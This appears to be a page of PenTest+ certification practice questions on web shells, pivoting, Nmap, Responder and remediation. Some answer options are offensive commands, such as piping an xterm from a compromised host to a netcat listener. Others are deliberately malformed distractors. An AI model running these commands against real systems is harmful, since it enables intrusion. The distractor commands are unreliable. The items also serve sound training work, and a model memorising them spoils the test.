Comptia (PT0-001) Exam Questions And Answers page 11
A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?
Obtaining client acceptance
Removing tester-created credentials
Documenting lessons learned
Presenting attestation of findings
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to check manually if a ghost vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
Download the GHOST file to a Linux system and compile
gcc -o GHOST
test i:
./GHOST
Download the GHOST file to a Windows system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST
Download the GHOST file to a Linux system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST
Download the GHOST file to a Windows system and compile
gcc -o GHOST
test i:
./GHOST
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal
From the local computer, run the following command:
ssh -L4444:127.0.0.1:6000 -X [email protected] xterm
From the remote computer, run the following command:
ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] xhost+; xterm
From the local computer, run the following command:
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
nmap -p 53 -oG dnslist.txt | cut -d : -f 4
nslookup -ns 8.8.8.8 <>
for x in {1...254}; do dig -x 192.168.$x.$x; done
dig -r > echo 8.8.8.8 >> /etc/resolv.conf
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
arpspoof
nmap
responder
burpsuite
Attacks and Exploits
Penetration Testing Tools
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information stored on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
Randomize the credentials used to log in.
Install host-based intrusion detection.
Implement input normalization.
Perform system hardening.
Attacks and Exploits
Penetration Testing Tools
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
Mandate all employees take security awareness training.
Implement two-factor authentication for remote access.
Install an intrusion prevention system.
Increase password complexity requirements.
Install a security information event monitoring solution.
Prevent members of the IT department from interactively logging in as administrators.
Upgrade the cipher suite used for the VPN solution.
Information Gathering and Vulnerability Identification
Attacks and Exploits
A penetration tester, who is not on the client's network, is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command:
nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?
nmap -Pn -sT 100.100.1.0-125
nmap -sF -p 100.100.1.0-125
nmap -sV -oA output 100.100.10-125
nmap 100.100.1.0-125 -T4
Planning and Scoping
Penetration Testing Tools
A penetration testing company is performing a penetration test against Company A. Company A has provided the IP address range 10.0.0.0/24 as its in-scope network range. During the information gathering phase, the penetration tester is asked to conduct active information-gathering techniques. Which of the following is the BEST tool to use for active information gathering?
hping3
theHarvester
tcpdump
Nmap
Information Gathering and Vulnerability Identification
Penetration Testing Tools